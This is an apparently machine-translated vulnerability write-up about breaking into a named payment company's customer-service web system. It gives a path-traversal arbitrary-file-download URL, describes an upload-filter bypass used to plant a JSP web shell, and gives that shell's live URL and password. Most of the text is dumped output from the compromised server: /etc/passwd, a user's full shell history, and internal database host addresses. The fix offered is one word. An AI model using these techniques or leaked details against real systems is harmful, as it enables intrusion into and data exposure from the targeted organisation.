Yifu downloads a website from bypassing upload to any file to getshell
Yifu downloads a website from bypassing upload to any file to getshell
Site: http://kf.bestpay.com.cn Tianyi e-commerce company customer service system
Chat with customer service MM: http://kf.bestpay.com.cn/zhij/imsystem/im/im_client.jsp? QueueId = 1011 & guestId = & sessionId = & keyword =
Here is a file upload:
It can be seen that there are restrictions. By truncation and modifying the package, attackers can bypass the upload and upload jsp files.
There is a very serious problem after the upload, and there is no way to get the shell path: No return, no similar path, no crawling, no google, no other sites with similar structures found
No way. I chatted with customer service MM for a while. <by the way, the customer service MM has a very good attitude and helped a lot.> <Thank you very much> asked her to download the file, and send the download link to my http://kf.bestpay.com.cn/zhij/imsystem/download.jsp? & MsgDirection = 1 & path = 20150129113305618_1.jsp & realFileName = 1.jsp
Obviously, this is an Arbitrary File Download. Test it:
http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp
The general idea of penetration is broken. You can only download vulnerabilities and analyze the source code. You can only download jsp, jsp, and other extensions, and cannot download extensions such as class.-!>, Thank you! Xiaopeng @ subversion. <Xiaopeng is a great java and jsp development engineer. Of course, he also likes security.>
Get the path of the file to be sent:/sendfile/client/
Splicing, get shell: http://kf.bestpay.com.cn/zhij/imsystem/sendfile/client/20150129113305618_1.jsp password: jspy
Database: it is my principle to keep your pants safe.
It seems that the permission is quite large:
Executing: cat /etc/passwd root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologin#games:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologin#ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin#nobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologingdm:x:42:42::/var/gdm:/sbin/nologinsabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologinwebapp:x:501:501::/home/webapp:/bin/bashkefu_remote:x:502:10::/home/kefu_remote:/bin/bashfengkong:x:503:505::/webapp/tykf2/upload/fengkong:/sbin/nologin
Executing: cat /home/webapp/.bash_history cd /cd web*llcd tykfllcd tykf3cd tykf*3cd ..binllcd bincd ../bincd ..cd webappcd web*llrm -rf WebReport2013070901cd ../llcd incd binll./sh*.shcd ../llcd web*ll rm -rf *2013*llcd ../binll./sta*.shcd ../logstail -f *.outcd /cd web*llcd tykfllcd tykf*3llcd bin./shutdown.sh ll./startup.sh ps -ef|grep javacd /llcd web*llcd tykfcd tykf*2cd binps -ef |grep javakill -9 15894ps -ef |grep java./sta*.shcd ../logstail -f *.outcd /webapp/tykf/tykf_tomcat_4/binpwdps -ef | grep javakill -9 12647ps -ef | grep java./startup.sh cd ../cd logstail -f catalina.outps -ef | grep javadf -hcd /webapp/tykf/tykf_tomcat_1/logsecho > catalina.outdf -htar -cvvf /webapp/tykf/data_bak/CustomerService20141126_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/cd /webapp/tykf/tykf_tomcat_4/binpwdps -ef | grep javakill -9 22736./startup.sh cd ../cd logstail -f catalina.outcd ../cd ../cd /webapp/tykf/tykf_tomcat_2/binpwdps -ef | grep javakill -9 24469ps -ef | grep java./startup.sh ps -ef | grep javacd ../cd logstail -f catalina.outcd /webapp/tykf/tykf_tomcat_4/workpwdps -ef | grep javapwdkill -9 26494ps -ef | grep javarm -rf Catalina/llcd ../cd bin./startup.sh cd ../cd logstail -f catalina.outcd /cd web*llcd tykfcd tykf*4cd logstail -f *.outcd /webapp/tykf/tykf_tomcat_4/logstail -f catalina.outtail -f catalina.outcd /llcd web*llcd tykfcd tykf*4cd binps -ef |grep javakill -9 24656ps -ef |grep java./sta*.shcd ../logstail -f *.outCD ../cd ../cd ../cd tykf*2cd binps -ef |grep javakill -9 7220./sta*.shcd ../logstail -f *.outdf -hdf -htail -f *.outcd ../llcd ../llcd tykf*1cd logstail -f *.outcd ../cd binps -ef |grep javakill -9 5462ps -ef |grep java./sta*.shcd ../logstail -f *.outps -ef |grep javacd ../llcd ../cd tykf*2cd ../logsllcd ../llcd tykf*2cd logstail -f *.outcd /webapp/tykf/tykf_tomcat_2/binpwdtoppwdps -ef | grep javakill -9 26605ps -ef | grep java./startup.sh ps -ef | grep javacd ../ cd logstail -f catalina.outcd /llcd web*llcd tykf*1cd tykfcd tykf*1cd logstail -f *.outCD ../cd ../cd binps -ef |grep javakill -9 26319ps -ef |grep java./sta*.shcd ../logstail -f *.outcd /cd web*llcd tykfcd tykf*4cd binps -ef |grep javakill -9 27076./sta*.shcd ../logstail -f *.outdf -hcd /webapp/tykf/tykf_tomcat_1/logspwdecho > catalina.outcd /webapp/tykf/tykf_tomcat_4/logspwdecho > catalina.outpwddf -htoppe -ef | grep javaps -ef | grep javaps -ef |grep javacd /webapp/tykf/tykf_tomcat_2/binpwdpwdps -ef | grep javakill -9 3533ps -ef | grep java./startup.sh cd ..cd logs tail -f catalina.outtopfreecd /webapp/tykf/tykf_tomcat_1/binpwdps -ef | grep javakill -9 3687ps -ef | grep java./startup.sh cd ../cd logstail -f catalina.outps -ef | grep javaps -ef | grep javacd /llcde web*llcd tykfcd web*llcd tykfcd tykf*4cd binps -ef |grep javakill -9 31606ps -ef |grep java./sta*.shcd ../logstail -f *.outlscd /llcd web*llcd tykfcd tykf*1llcd web*llcd zhijllcd im*llcd ../cd ims*llcd imllll -arm - rf .svnrm -fr .svnllll -acd ../llll -arm -fr .svnll -acd ../ll -acd imcd g*cd g*ll -acd ../cd /webapp/tykf/tykf_tomcat_4/binpwdpwdps -ef | grep javakill -9 15585./startup.sh ps -ef | grep javacd ../cd logstail -f catalina.outdf -hping 183.63.191.47cd /llcd web*llcd tykfllcd tykf*1cd logstail ~-f *.outtail -f *.outcd /webapp/tykf/tykf_tomcat_4/binpwdps -ef | grep javakill -9 22868ps -ef | grep java./startup.sh cd ../cd logstail -f catalina.outps -ef | grep javaps -ef | grep javadf -hcd /webapp/tykf/tykf_tomcat_4/logspwdecho > catalina.outps -ef | grep javacd /webapp/tykf/tykf_tomcat_1/logspwdpwdecho > catalina.outps -ef | grep javaps -ef | grep javadf -htopcd /llcd web*llcd tykfllcd tykf*5cd logstail -f *.outcd ../cd binps -ef |grep javakill -9 23355./sta*.shcd ../logstail -t *.outtail -f *.outcd /llcd web*llcd tykfcd tykf*1cd lgoscd logcd logstail -f *.outtail -f *.outping 172.16.248.123telnet 172.16.248.123 8090telnet 172.16.248.123 8090telnet 172.16.248.123 8080cd /llcd web*llcd tykfcd tykf*1cd logstail -f *.outtail -f *.outcd /webapp/tykf/tykf_tomcat_4/binpwdpwdps -ef | grep javakill -9 32625ps -ef | grep java./startup.sh cd ../cd logsps -ef | grep javaps -ef | grep javatail -f catalina.outdh -fdf -hcd /webapp/tykf/tykf_tomcat_2/logspwdecho > catalina.outdf -hdatedatedatecd /cd web *cd/dh -fdf -htar -cvvf /webapp/tykf/data_bak/zhij20141222_01.tar.gz /webapp/tykf/tykf_tomcat_1/webapps/zhij/ cd tar -cvvf /webapp/tykf/data_bak/CustomerService20141222_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/tar -cvvf /webapp/tykf/data_bak/CustomerService20141222_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/cd /webapp/tykf/tykf_tomcat_2ps -ef | grep javapwdpwdps -ef | grep javakill -9 23665ps -ef | grep javacd libcd ../cd bin./startup.sh cd ../ cd logstail -f catalina.outcd /webapp/tykf/tykf_tomcat_2/workpwdpwdpwdps -ef | grep javakill -9 341ps -ef | grep javarm -rf Catalina/llcd ../cd bin./startup.sh cd ../cd logstail -f catalina.outcd /webapp/tykf/tykf_tomcat_1/binpwdps -ef | grep javakill -9 1997ps -ef | grep java./startup.sh cd ../cd logstail -f catalina.outdf -hcd /webapp/tykf/tykf_tomcat_1/logspwdecho > catalina.outdf -hdf -hdf -hdf -hdf -hdf -hcd /webapp/tykf/tykf_tomcat_1/binpwdpwdps -ef | grep javaps -ef | grep javakill -9 787ps -ef | grep javaps -ef | grep java./startup.sh cd ../cd logstail -f catalina.outcd /webapp/tykf/tykf_tomcat_1/binpwdps -ef | grep javakill -9 10418ps -ef | grep java./startup.sh cd ..cd logstail -f catalina.outps -ef | grep javaps -ef | grep javaps -ef | grep javadh -fdf -hps -ef | grep javaps -ef | grep javaps -ef | grep javaps -ef | grep javaps -ef | grep javacd /llcd web*llcd tykfcd tykf*3llcd web*llcd ../binps -ef |grep javaps -ef |grep javakill -9 28990./sta*.shcd ../logstail -f *.outd /cd /llcd web*llcd tykfcd tykf*4cd binps -ef |grep javakill -9 17366./sta*.shcd ../logstail -f *.outcd /cd /llcd web*llcd tykfcd tykf*1cd bincd ../logstail -f *.outcd ../binps -ef |grep jaVAps -ef |grep javakill -9 10764ps -ef |grep java./sta*.shcd ../logstail -f *.outdf- hdh -fdh -fdf -hdf -hdf -hdf -hdf -hdf -hdf -hdf -hdf -hdf -hdf -hcd /webapp/tykf/tykf_tomcat_1/logspwdecho > catalina.outdf -hdf -hdf -hdf -hdf -hdf -hcd /webapp/tykf/tykf_tomcat_4/logstail -f catalina.tail -f catalina.outcd /llcd web*cd tykfcd tykf*5cd bincd /webapp/tykf/tykf_tomcat_4/binpwdpwdps -ef | grep javakill -9 25027ps -ef | grep java./startup.sh ps -ef | grep javacd ../cd logstail -f catalina.outcd /webapp/tykf/tykf_tomcat_4/binpwdpwdps -ef | grep javakill -9 32504ps -ef | grep java./startup.sh cd ../cd logs tail -f catalina.outps -ef | grep javacd /llcd web*llcd tykfcd tykf*5cd binps -ef |grep javakill -9 9155ps -ef |grep java./sta*.shcd ../logstail -f *.outcd ../cd ../cd tykf*1cd binps -ef |grep javakill -9 30983ps -ef |grep java./sta*.shcd ../logstail -f *.outps -ef |grep javatail -f *.outcd ../cd ../cd tykf*5cd logstail -f *.outtail -f *.outCD ../cd ../cd ../cd tykf*4cd logstail -f *.outcd ?cd /llcd web*llcd tykfllcd tykf*4cd logstail -f *.outtail -f *.outtail -f *.outcd ../cd /cd web*llcd tykfllcd tykf*4cd logstail -f *.ouy\ttail -f *.outtail -f *.outtail -f *.outdf -htopps -ef |grep javacd /ll cd web*llcd tykfllcd tykf*4cd web*llll -hllcd blazer*llcd ../cd /cd /ps -ef |grep javaps -ef |grep javacd web*llcd tykfllcd tykf*6cd web*llcd ../cd web*rm -rf *cd /llcd web8cd web*llcd tykfcd tykf*6cd binps -ef |grep javaps -ef |grep java./sta*.shcd ../logstail -f *.outdatecd /webapp/tykf/tykf_tomcat_4/binpwdps -ef | grep javakill -9 7231ps -ef | grep java./startup.sh ps -ef | grep javacd ../cd logstail -f catalina.outcd /cd tykfllcd web*cd tykfllcd tykf86cd tykf*6cd logstail -f *.outtail -f *.outdatetail -f *.outps -ef |grep javatail -f *.outcd ../binllcd ../cd bin./sh*.shps -ef |grep javacd ../logstail -f *.outtail -f *.outtail -f *.outps -ef |grep javacd ../bin./sta*.shcd ../logstail -f *.outcd /cd web*llcd tykfcd tykf*6cd logstail -f *.outps -ef |grep javatail -f *.outcd ../cd bin./sh*.shps -ef |grep java./sta*.shcd ../logstail -f *.outps -ef |grep javatail -f *.outtail -f *.outdatedatedatecd /llcd web*llcd tykf*lllcd tykf84cd tykf84cd tykf*4cd logstail -f *.outlscd /llcd web*llcd tykfcd tykf*4cd logstail -f *.outtail -f *.outtail -f *.outcd /llcd web*llcd tykfllcd tykf*6cd binps -ef |grep javakill -9 14621ps -ef |grep java./sta*.shcd ../logstail -f *.outps -ef |grep javacd /webapp/tykf/tykf_tomcat_4/binpwdps -ef | grep javakill -9 29427ps -ef | grep java./startup.sh ps -ef | grep javacd ../cd logstail -f catalina.outtelnet 172.16.248.128 8080telnet 172.16.248.128 8081telnet 172.16.248.128 8080ping http://172.16.248.128:8080ping 172.16.248.128:8080ping 172.16.248.128 8080ping 172.16.248.128 8080ping 172.16.248.128df -hcd /webapp/tykf/tykf_tomcat_4/logspwdecho > catalina.outecho > catalina.outcd /webapp/tykf/tykf_tomcat_2/logspwdecho > catalina.outcd /webapp/tykf/tykf_tomcat_1/logspwdecho > catalina.outecho > catalina.outdf -hcd /webapp/tykf/tykf_tomcat_5/logspwdecho > catalina.outdf -hps -ef | grep javafind /webapp/tykf2/robotfind /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;ps -ef | grep javapwdcd find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;cd /webapp/tykf2llcd robotfind -type f | wc -lcd find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;find -type f | wc -lfind /webapp/tykf2/robot -type f -mtime+30 -exec rm {} \;find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;pwdfind -type f | wc -lps -ef | grep javapwdpwdfind /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;find -type f | wc -lfind /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;find -type f | wc -lfind /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;find -type f | wc -lfind -type f | wc -lfind /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;find -type f | wc -ltopdf -hcd /webapp/tykf/tykf_tomcat_4/binpwdps -ef | grep javakill -9 16675ps -ef | grep java./startup.sh ps -ef | grep javaps -ef | grep javacd ../cd logstial -f catalina.outtail -f catalina.outcd /llcd web*llcd tykfllcd tykf*5llcd logsll -hrm -rf 2014*.txtllrm -rf l*2014*.txtllrm -rf E*2014*.logllecho > catalina.outll -hcd ../binps -ef |grep javakill -9 28239./sta*.shcd ../logstail -f *.outtail -f *.outcd ../llcd ../llcd tykf*2cd logstail -f *.outcde /cd /llps -ef |grep javacd /llcd web*llcd tykfllcd tykf*5cd ../cd tykf*4cd binps -ef |grep javakill -913880kill -9 13880./sta*.shcd ../lgostacd ../logs tail -f *.outps -ef |grep javaps -ef |grep javacd /llcd web*llcd tykfllcd tykf*6llcd binllcd ../llcd bin./sh*.shps -ef |grep java./sh*.shps -ef |grep java./sta*.shcd ../logstail -f *.outdf -hcd /llcd web*llcd tykf*llcd tykf*6cd binps -ef |grep java./sh*.shps -ef |grep java./sta*.shcd ../logstail -f *.outcd /llps -ef |grep javacd /llps -ef | grep sftpftpftp 127.0.0.1ps -ef | grep javaps -ef | grep vsftpdsu rootsu rootsu su - root command not foundservice vsftpd stopeixtpwdlsgrep fengkong /etc/passwdcd /webapp/tykf2/upload/fengkongll -d .cp qq??20141206104355_201412061044.jpg test123.jpgcd ..ll fengkong/ll -d fengkong/cd fengkong/chown o+w test123.jpgchmod o+w test123.jpgll test123.jpgcd ..exit
Executing: cat /etc/hosts # Do not remove the following line, or various programs# that require network functionality will fail.127.0.0.1 localhost.localdomain localhost::1 localhost6.localdomain6 localhost6172.17.66.11 kfdb1172.17.66.13 kfdb2172.17.66.12 vip_kfdb1172.17.66.14 vip_kfdb2
Solution:
Filter